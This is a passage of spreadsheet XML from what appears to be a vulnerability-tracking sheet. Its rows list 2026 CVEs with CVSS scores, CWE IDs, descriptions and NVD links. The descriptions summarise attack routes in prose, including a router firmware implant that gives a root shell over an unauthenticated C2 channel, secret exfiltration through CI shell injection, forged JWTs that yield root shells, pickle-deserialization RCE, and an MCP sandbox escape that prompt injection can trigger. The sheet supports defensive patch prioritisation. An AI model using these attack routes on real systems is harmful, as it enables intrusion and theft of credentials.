      </c>
      <c r="M448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64827</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65641</t>
        </is>
      </c>
      <c r="C449" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D449" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E449" s="5" t="inlineStr"/>
      <c r="F449" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="inlineStr"/>
      <c r="I449" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J449" s="5" t="inlineStr"/>
      <c r="K449" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L449" s="5" t="inlineStr">
        <is>
          <t>A vulnerability allowing an unauthenticated network attacker to coerce SMB authentication from the service account.</t>
        </is>
      </c>
      <c r="M449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65641</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66747</t>
        </is>
      </c>
      <c r="C450" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D450" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E450" s="5" t="inlineStr"/>
      <c r="F450" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="inlineStr"/>
      <c r="I450" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J450" s="5" t="inlineStr"/>
      <c r="K450" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L450" s="5" t="inlineStr">
        <is>
          <t>Zbtlink router firmware ships an embedded remote-control implant, ENDLESSDOORS, present in every published build across the product line. It is the open-source ycsunjane/rctl tool built in as an OpenWrt package (librctl.so), started at boot and run as root under the process name kworker to blend in with the kernel's [kworker/*] threads. It opens no listening port; it phones home over cleartext TCP to a hardcoded command-and-control server (command channel 7000, interactive-shell callback 7001) with no authentication and no transport encryption, re-attempting contact roughly every 35 seconds. Its command handler passes any received string to popen() as uid=0, and a reserved rctlbash command returns an interactive root shell. Because the channel is unauthenticated and cleartext, control is not limited to whoever planted it: any party that answers at the C2 address, occupies the network path (DNS or route hijack), or acquires the hardcoded fallback domain obtains unauthenticated remote code execution as root.</t>
        </is>
      </c>
      <c r="M450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66747</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66794</t>
        </is>
      </c>
      <c r="C451" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D451" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E451" s="5" t="inlineStr"/>
      <c r="F451" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G451" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H451" s="5" t="inlineStr"/>
      <c r="I451" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L451" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the `cluster-proxy-addon` component of Multicluster Engine for Kubernetes. This vulnerability allows an unauthenticated attacker, who can access the user-facing route, to bypass authentication and authorization checks. By manipulating URL path segments, the attacker can proxy requests to arbitrary services across any managed cluster. This enables unauthorized access to internal services that would otherwise be protected, potentially leading to information disclosure or further compromise of the cluster environment.</t>
        </is>
      </c>
      <c r="M451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66794</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67308</t>
        </is>
      </c>
      <c r="C452" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D452" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E452" s="5" t="inlineStr"/>
      <c r="F452" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G452" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H452" s="5" t="inlineStr"/>
      <c r="I452" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L452" s="5" t="inlineStr">
        <is>
          <t>Wazuh workflows before 44bf114 contain a shell injection vulnerability in GitHub Actions that allows attackers to execute arbitrary commands by submitting pull requests with crafted VERSION.json files. Attackers can inject shell metacharacters into environment variables that are directly interpolated into run steps, enabling command execution and exfiltration of secrets including GITHUB_TOKEN and AWS credentials on self-hosted runners.</t>
        </is>
      </c>
      <c r="M452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67308</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67531</t>
        </is>
      </c>
      <c r="C453" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D453" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E453" s="5" t="inlineStr"/>
      <c r="F453" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="inlineStr"/>
      <c r="I453" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J453" s="5" t="inlineStr"/>
      <c r="K453" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L453" s="5" t="inlineStr">
        <is>
          <t>FrontMCP is a TypeScript-first framework for the Model Context Protocol (MCP). Prior to 1.5.7, the sandboxed codecall:execute tool exposes live host Zod schema instances to the script via getTool(), and because Zod v4 defines _zod as a non-configurable, non-writable own property, the ECMAScript Proxy invariants force the security membrane to hand back the raw host object, letting a script reach _zod.constr.constructor (the host Function constructor) and execute arbitrary code in the server process. A single tools/call is sufficient to escape the sandbox and achieve remote code execution as the server user, exposing everything the process holds such as OAuth client secrets, JWT_SECRET, session keys, database credentials, and cloud instance metadata. Because the framework's DEFAULT_AUTH_OPTIONS is public mode, an unconfigured server serves this to unauthenticated callers, and on authenticated servers an indirect prompt injection in tool output or fetched content can trigger it without a human attackerThis issue is fixed in version 1.5.7.</t>
        </is>
      </c>
      <c r="M453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67531</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67614</t>
        </is>
      </c>
      <c r="C454" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D454" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E454" s="5" t="inlineStr"/>
      <c r="F454" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="inlineStr"/>
      <c r="I454" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J454" s="5" t="inlineStr"/>
      <c r="K454" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L454" s="5" t="inlineStr">
        <is>
          <t>CyberPanel before 3.0.0 contains a hard-coded JWT secret vulnerability in the WebTerminal FastAPI SSH service that allows unauthenticated remote attackers to forge valid authentication tokens and obtain an interactive root shell via WebSocket on port 8888. Attackers can craft a forged JWT signed with the hardcoded secret value, specifying ssh_user=root, to authenticate to the terminal service without any valid credentials and receive a root shell.</t>
        </is>
      </c>
      <c r="M454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67614</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68582</t>
        </is>
      </c>
      <c r="C455" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D455" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E455" s="5" t="inlineStr"/>
      <c r="F455" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G455" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H455" s="5" t="inlineStr"/>
      <c r="I455" s="5" t="inlineStr">
        <is>
          <t>2026-08-02</t>
        </is>
      </c>
      <c r="J455" s="5" t="inlineStr"/>
      <c r="K455" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L455" s="5" t="inlineStr">
        <is>
          <t>Vikunja versions &gt;= 0.24.0 and &lt;= 2.3.0 contain a broken object level authorization (BOLA) vulnerability in the task-collection endpoint (GET /api/v1/projects/{project}/views/{view}/tasks). The endpoint loads the requested project view from the URL path without verifying the caller is authorized for it. For a link-share token holder, the task scope is pinned to the share's own project, but the view is taken from the attacker-controlled path and never re-validated. As a result, a holder of any project share link can read any other tenant's kanban bucket records — bucket titles and the full created_by user object (username, name, id) — for every view in the instance. The same missing pre-authorization view load also creates a project/view-ID existence oracle (404 vs. non-404) usable by link shares and ordinary authenticated users. Task contents remain constrained to the share's own project and are not disclosed. Fixed in 2.4.0.</t>
        </is>
      </c>
      <c r="M455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68582</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68770</t>
        </is>
      </c>
      <c r="C456" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D456" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E456" s="5" t="inlineStr"/>
      <c r="F456" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G456" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H456" s="5" t="inlineStr"/>
      <c r="I456" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J456" s="5" t="inlineStr"/>
      <c r="K456" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L456" s="5" t="inlineStr">
        <is>
          <t>sentence-transformers contains a security control bypass vulnerability that allows attackers to achieve arbitrary code execution by exploiting a logic flaw in the import_module_class helper within sentence_transformers/util/misc.py, where the guard condition includes an 'or os.path.exists(model_name_or_path)' clause that satisfies the trust gate whenever the supplied path exists on the local filesystem, regardless of the trust_remote_code=False argument. Attackers who can control or influence the contents of a model directory on disk can place malicious Python files such as modeling_*.py referenced via modules.json, causing the code to execute at import time when an application loads the model with SentenceTransformer(path, trust_remote_code=False), bypassing the documented security contract and achieving code execution within the loading process.</t>
        </is>
      </c>
      <c r="M456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68770</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68771</t>
        </is>
      </c>
      <c r="C457" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D457" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E457" s="5" t="inlineStr"/>
      <c r="F457" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G457" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H457" s="5" t="inlineStr"/>
      <c r="I457" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J457" s="5" t="inlineStr"/>
      <c r="K457" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L457" s="5" t="inlineStr">
        <is>
          <t>ComfyUI v0.23.0 contains an unsafe deserialization vulnerability in the LoadTrainingDataset node that allows unauthenticated remote attackers to execute arbitrary Python code by uploading a crafted pickle file and triggering its deserialization. Attackers can upload a malicious shard_*.pkl file via the unauthenticated POST /upload/image endpoint and then queue a workflow graph via POST /prompt referencing the uploaded file, causing torch.load to deserialize the attacker-controlled pickle payload using __reduce__ and execute arbitrary commands as the ComfyUI process user.</t>
        </is>
      </c>
      <c r="M457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68771</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68929</t>
        </is>
      </c>
      <c r="C458" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D458" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E458" s="5" t="inlineStr"/>
      <c r="F458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="inlineStr"/>
      <c r="I458" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="L458" s="5" t="inlineStr">
        <is>
          <t>FastGPT is an open-source LLM platform for building AI applications on a knowledge base. In versions prior to 4.15.2, the WeChat (iLink) share-channel endpoints authorize requests using only the public shareId, with no authenticated identity or team-ownership check. As a result, an unauthenticated attacker who knows a victim team's shareId can take that team's WeChat bot offline or hijack the channel to their own bot: the logout endpoint is gated only by an existence check yet wipes the outLink's stored WeChat token, and the QR-code status endpoint performs no authorization at all and writes attacker-supplied bot credentials into the outLink identified by shareId. By generating a QR for a victim shareId, scanning it with their own WeChat, and calling the status endpoint, an attacker binds the victim team's app to the attacker's bot, exposing the app's private responses, displacing the legitimate binding, and consuming the victim's resources. The shareId is exposed in every shared chat URL, iframe, and embed, so it is not a secret. This issue is fixed in version 4.15.2.</t>
        </is>
      </c>
      <c r="M458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68929</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69356</t>
        </is>
      </c>
      <c r="C459" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D459" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E459" s="5" t="inlineStr"/>
      <c r="F459" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G459" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H459" s="5" t="inlineStr"/>
      <c r="I459" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L459" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69356</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69657</t>
        </is>
      </c>
      <c r="C460" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D460" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E460" s="5" t="inlineStr"/>
      <c r="F460" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="inlineStr"/>
      <c r="I460" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr">
        <is>
          <t>CWE-1393</t>
        </is>
      </c>
      <c r="L460" s="5" t="inlineStr">
        <is>
          <t>XING CPTrans-ME-X contains a Use of Default Password (CWE-1393). Anyone with the knowledge of the credential may log in to the affected device.</t>
        </is>
      </c>
      <c r="M460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69657</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70403</t>
        </is>
      </c>
      <c r="C461" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D461" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E461" s="5" t="inlineStr"/>
      <c r="F461" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="inlineStr"/>
      <c r="I461" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr">
        <is>
          <t>CWE-259</t>
        </is>
      </c>
      <c r="L461" s="5" t="inlineStr">
        <is>
          <t>XING CPTrans-ME-X contains a Use of Hard-coded Password (CWE-259). Anyone with the knowledge of the credential may log in to the affected device.</t>
        </is>
      </c>
      <c r="M461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70403</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71864</t>
        </is>
      </c>
      <c r="C462" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D462" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E462" s="5" t="inlineStr"/>
      <c r="F462" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G462" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H462" s="5" t="inlineStr"/>
      <c r="I462" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="L462" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a double quote in a header parameter name is emitted into the generated request-validation zod.object({...}) schema without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts and header request-validation generation. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71864</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71865</t>
        </is>
      </c>
      <c r="C463" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D463" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E463" s="5" t="inlineStr"/>
      <c r="F463" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G463" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H463" s="5" t="inlineStr"/>
      <c r="I463" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J463" s="5" t="inlineStr"/>
      <c r="K463" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="L463" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a double quote in a query parameter name is emitted into the generated request-validation zod.object({...}) schema without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts and query request-validation generation. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71865</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71866</t>
        </is>
      </c>
      <c r="C464" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D464" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E464" s="5" t="inlineStr"/>
      <c r="F464" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G464" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H464" s="5" t="inlineStr"/>
      <c r="I464" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr">
        <is>
          <t>CWE-89, CWE-95</t>
        </is>
      </c>
      <c r="L464" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. From version 8.19.0 until 8.21.0, a double quote in a schema property name is emitted into the generated zod.object({...}) schema without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts and zod object-key generation. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71866</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71867</t>
        </is>
      </c>
      <c r="C465" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D465" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E465" s="5" t="inlineStr"/>
      <c r="F465" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G465" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H465" s="5" t="inlineStr"/>
      <c r="I465" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr">
        <is>
          <t>CWE-89, CWE-95</t>
        </is>
      </c>
      <c r="L465" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a single quote in a schema property name is emitted into single-quoted object keys in generated MSW mock factories without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated mock factory is called by tests or an MSW handler, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/core/src/getters/keys.ts function getKey and MSW mock generation. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71867</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71868</t>
        </is>
      </c>
      <c r="C466" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D466" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E466" s="5" t="inlineStr"/>
      <c r="F466" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G466" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H466" s="5" t="inlineStr"/>
      <c r="I466" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L466" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a ${...} expression or backtick in an enum default is emitted into a module-level template literal emitted by zod schema generation without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts function formatDefaultValue. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71868</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71869</t>
        </is>
      </c>
      <c r="C467" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D467" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E467" s="5" t="inlineStr"/>
      <c r="F467" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G467" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H467" s="5" t="inlineStr"/>
      <c r="I467" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L467" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a ${...} expression or backtick in an array item default is emitted into a module-level template literal emitted by zod schema generation without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts function formatDefaultValue. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71869</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71871</t>
        </is>
      </c>
      <c r="C468" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D468" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E468" s="5" t="inlineStr"/>
      <c r="F468" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G468" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H468" s="5" t="inlineStr"/>
      <c r="I468" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L468" s="5" t="inlineStr">
        <is>
